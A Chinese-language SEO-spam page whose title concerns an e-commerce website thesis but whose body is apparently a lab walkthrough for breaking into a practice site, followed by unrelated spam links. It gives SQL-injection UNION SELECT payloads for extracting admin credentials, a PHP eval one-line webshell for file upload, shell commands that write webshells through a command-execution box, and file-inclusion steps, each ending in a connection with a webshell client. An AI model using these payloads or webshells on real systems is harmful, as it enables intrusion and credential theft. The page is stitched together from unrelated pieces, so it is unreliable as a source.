当前位置: 首页 > news >正文

电子商务与网站建设实践论文网站建设知名企业

电子商务与网站建设实践论文,网站建设知名企业,建设银行公积金网站,湖南微信网站建设寻找漏洞 一,我们打开页面 第一个漏洞 xss漏洞 1.在登录页面显示有弹窗 第二个漏洞 sql注入漏洞 1.在输入框的地方输入-1 union select 1,2,3#我们来查看他的回显点 2.查看数据库表名 -1 union select 1,database(),3# 3.查看表名 -1 union select 1,2,group…

寻找漏洞

一,我们打开页面

第一个漏洞

xss漏洞

1.在登录页面显示有弹窗

第二个漏洞

sql注入漏洞

1.在输入框的地方输入-1 union select 1,2,3#我们来查看他的回显点

2.查看数据库表名

-1 union select 1,database(),3#

3.查看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

4.查看admin中的列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

5.查看账号密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

6.成功登录进来

第三个漏洞

文件上传漏洞

1.我们登录进去往下滑有个上传文件我们上传一个1.php

<?php @eval($_POST['cmd']);?>

2.用蚁剑连接一下

第四个漏洞

命令执行漏洞

1.页面下方有一个执行框,输入ls查看

2.输入echo '<?php phpinfo();?>' > wff.php 访问wff.php

3.写入一句话木马,访问1.php

echo '<?php @eval($_POST['cmd']);?>' > 1.php

4.蚁剑连接

第五个漏洞

文件包含漏洞

1.在关于页面中发现存在文件包含漏洞

2.通过访问之前写入的wff.php查看,远程文件包含关闭,本地文件可以访问

3.访问1.php

4.蚁剑连接

http://www.yayakq.cn/news/394503/

相关文章:

  • 网站后台生成器百度快照优化排名推广
  • 怎么区分网站是模板做的东莞推广平台有哪些
  • 企业网站搭建哪家好温岭网站建设公司
  • 深圳外贸网站开发vps做网站用什么系统
  • 大学网站建设排名微信公众平台文章 wordpress
  • wordpress转移整站cloudflare cdn
  • 常州制作企业网站重庆网站建设的公司哪家好
  • 网站软件有哪些做网站数据库要建什么表
  • 互动型网站学网站开发前景
  • 网站开发洽谈客户话术win10怎么删除2345网址导航
  • 电脑做网站服务器需要什么自动化设计网站建设
  • 阿里巴巴国际站做2个网站有用吗怎样用js做网站轮播图
  • 网站如何做原创wordpress主题lovephoto2.0.1
  • 浙江建设干部学校网站无为县建设局网站
  • 建设部注册中心网站网站开发中的文档
  • 网站制作超链接怎么做工作室注册流程
  • 南屏网站建设做网站公司介绍ppt
  • 如何查公司网站开发时间建立企业网站费用
  • 做室内设计的网站有哪些内容网络营销首先要进行
  • 定制网站建设开发查注册公司什么网站
  • 普宁旅游网站设计方案自己在线制作logo免费模版
  • 上海哪家网站建设好交友app搭建
  • 外贸在哪些网站做建立网站可以赚钱吗
  • 怎么进入企业的网站成都网站制作收费
  • 网站开发者取色工具专业柳州网站建设多少钱
  • 广州网站建设哪里好快速开发平台社区
  • 贵阳网站建设网站制作58同城网站建设
  • 建立旅游公司网站多钱wordpress 原理
  • seo优化培训公司海阳seo排名
  • 刚开始做网站布局很吃力 怎么办wordpress右下角广告代码